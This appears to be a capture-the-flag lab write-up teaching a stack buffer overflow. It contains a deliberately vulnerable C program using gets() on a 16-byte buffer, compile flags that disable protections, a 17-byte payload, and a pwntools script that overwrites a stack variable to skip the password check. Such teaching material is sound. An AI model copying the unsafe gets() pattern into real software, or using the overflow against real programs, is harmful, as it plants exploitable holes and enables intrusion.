| description |
|---|
08/15/2023 |
This is an entirely custom project that I am extremely proud of. It consists of us overwriting variables on the stack in order to bypass compares so that you can grab the flag without even having the right password.
Can you find the password?
How can you get the flag without using the correct password?
#include <stdio.h>
#include <string.h>
const char* hacked()
{
const char* local_flag = {"XYC{H0wD1d1G3tH3r3?!}"};
printf("This is a secret function.\n");
printf("Access level 0 is required. All attempts to access will be logged.\n");
printf("Oh yeah, here's your flag: %s\n", local_flag);
return local_flag;
}
char * flag = "XYC{H0wD1d1G3tH3r3?!}";
int main()
{
char code[16];
int access = 0;
printf("Please enter the secret code: \n");
gets(code);
fflush(stdout);
if(strcmp(code, "1337") == 0)
{
flag = hacked();
access = 1;
}
else
{
printf("Access denied, silent alarm has been triggered!\n");
}
if(access)
{
printf("Authentication successful as root (access level=%d) \n", access);
printf("You are root, granting access... \nAccess granted, welcome root.\n");
printf("Wow, you realized we could overflow the buffer and you could still get the flag? Nice.\nHere's your flag: %s", flag);
}
else
{
printf("Authentication failed as root (access level=%d)\n", access);
}
return 0;
}Compile:
gcc 01.c -o 01 -m32 -fno-stack-protector -z execstack -no-pie -g
We can see that we have a hacked() function which contains our flag. Notice the return of local_flag.
We can also see that our flag is being set as a global so it can be accessed through main and passed throughout the program.
Also, be conscious of the dangerous gets() call again, as we remember why this is dangerous from our last example in 00.
Our strcmp() is being compared to our input to our buffer (code) which is of 16-bytes and is looking for the correct input of "1337" so that we can access our secret function.
If we can input the password correctly, we will be granted access to the secret function.
If not, we will trigger the alarm.
python2:
python2 -c 'print "A" * 17' > payload
Exploit:
./01 < payload
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
exploit.py:
from pwn import *
# Establish the connection to the program
p = process('./01') # Change this to the actual path of the '01' program
context.log_level = 'debug'
# Wait for the ':' prompt
p.recvuntil(':')
# Send 17 bytes of 'A' characters
payload = b'A' * 17
p.sendline(payload)
# Print the program's output
print(p.recvall().decode())
# Close the connection
p.close() (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
We can see our payload of A's overwriting our variables on the stack so we can bypass the comparisons/checks and get straight into the right version of our hacked() function that we want.
 (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
We never inputed the correct password of "1337":
.png)